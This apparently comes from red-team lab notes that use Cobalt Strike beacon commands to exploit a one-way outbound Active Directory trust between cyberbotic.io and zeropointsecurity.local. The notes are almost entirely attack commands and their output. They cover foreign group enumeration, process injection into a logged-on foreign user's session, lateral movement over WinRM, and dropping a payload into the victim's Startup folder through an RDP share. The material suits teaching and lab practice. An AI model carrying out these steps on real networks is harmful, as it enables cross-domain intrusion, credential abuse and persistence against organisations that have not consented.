One Way (Outbound)
Get foreign users in our current domain belongs to the outbound domain
beacon> powershell Get-DomainForeignGroupMember -Domain cyberbotic.io
GroupDomain : cyberbotic.io
GroupName : Jump Users
GroupDistinguishedName : CN=Jump Users,CN=Users,DC=cyberbotic,DC=io
MemberDomain : cyberbotic.io
MemberName : S-1-5-21-3022719512-2989052766-178205875-1115
MemberDistinguishedName : CN=S-1-5-21-3022719512-2989052766-178205875-1115,CN=ForeignSecurityPrincipals,DC=cyberbotic,DC=io
Enumerate the privileges of this group (we can't convert SID)
beacon> powershell Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
sql-1.cyberbotic.io
exch-1.cyberbotic.io
beacon> powershell Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
sql-1.cyberbotic.io
exch-1.cyberbotic.io
Compromise these machines and waits until the targeted user logs in
beacon> net logons
Logged on users at \\localhost:
ZPS\jean.wise
CYBER\SQL-1$
Does
jean.wise
have any privileged access inzeropointsecurity.local
?Can we reach any useful ports/services (445, 3389, 5985 etc) in
zeropointsecurity.local
?
beacon> portscan 10.10.18.0/24 139,445,3389,5985 none 1024
# Inject to external user session
beacon> inject 4960 x64 tcp-local
[+] established link to child beacon: 10.10.15.90
Now we can enumerate the external domain and access the external machines
beacon> remote-exec winrm sql01.zeropointsecurity.local whoami; hostname
zps\jean.wise
sql01
beacon> jump winrm64 sql01.zeropointsecurity.local pivot-sql-1
[+] established link to child beacon: 10.10.18.221
OR via Shares via RDP
beacon> ls \\tsclient\c
beacon> cd \\tsclient\c\Users\jean.wise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
beacon> ls
Last updated